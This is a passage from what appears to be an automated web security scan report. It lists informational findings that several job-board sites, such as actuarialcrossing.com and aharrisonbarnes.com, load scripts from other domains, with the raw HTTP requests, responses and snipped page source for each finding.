Date: Fri, 21 Jan 2011 22:21:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m8i6cd531h6rsd383n5t999356; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116767

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.3. http://www.accountmanagementcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.accountmanagementcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.accountmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bvhhpa1stegtb9iluknr76tt84; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 137270

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.4. http://www.actuarialcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.actuarialcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.actuarialcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gfsjuvk6a0eja28o52r05s3445; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114356

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.5. http://www.admincrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.admincrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.admincrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9hecq37ajcfirr9ve90dobkne6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:29 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109804

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.6. http://www.advertisingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.advertisingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.advertisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4vstlithvj0cev5m57soav4bi3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:29 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121935

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.7. http://www.aerospacecrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aerospacecrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.aerospacecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:33 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=smekqvtb2jtrk9a1sqbg5kk4u3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:33 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.8. http://www.agriculturalcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.agriculturalcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.agriculturalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:34 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ukabttsk8nejv6h58lpcqprfk1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102618

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.9. http://www.aharrisonbarnes.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aharrisonbarnes.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js

Request

GET / HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.10. http://www.aharrisonbarnes.com/contact-us/script/functions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aharrisonbarnes.com
Path:	/contact-us/script/functions.js

Issue detail

The response dynamically includes the following script from another domain:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js

Request

Response

HTTP/1.1 404 Not Found
Date: Sat, 22 Jan 2011 00:17:06 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=a0f1qvin1rmg1u6sbvil1pk2c0; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Last-Modified: Sat, 22 Jan 2011 00:17:07 GMT
Set-Cookie: wpgb_visit_last_php-default=1295655427; expires=Sun, 22-Jan-2012 00:17:07 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 93480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.11. http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aharrisonbarnes.com
Path:	/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/

Issue detail

The response dynamically includes the following script from another domain:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:36 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=td5el2h9micq2p5p4knldobtl7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648498; expires=Sat, 21-Jan-2012 22:21:38 GMT; path=/
Link: <http://www.aharrisonbarnes.com/?p=1189>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 185016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.12. http://www.aharrisonbarnes.com/hb-course/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aharrisonbarnes.com
Path:	/hb-course/

Issue detail

The response dynamically includes the following script from another domain:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js

Request

GET /hb-course/ HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.13. http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aharrisonbarnes.com
Path:	/push-yourself-outside-your-comfort-zone/

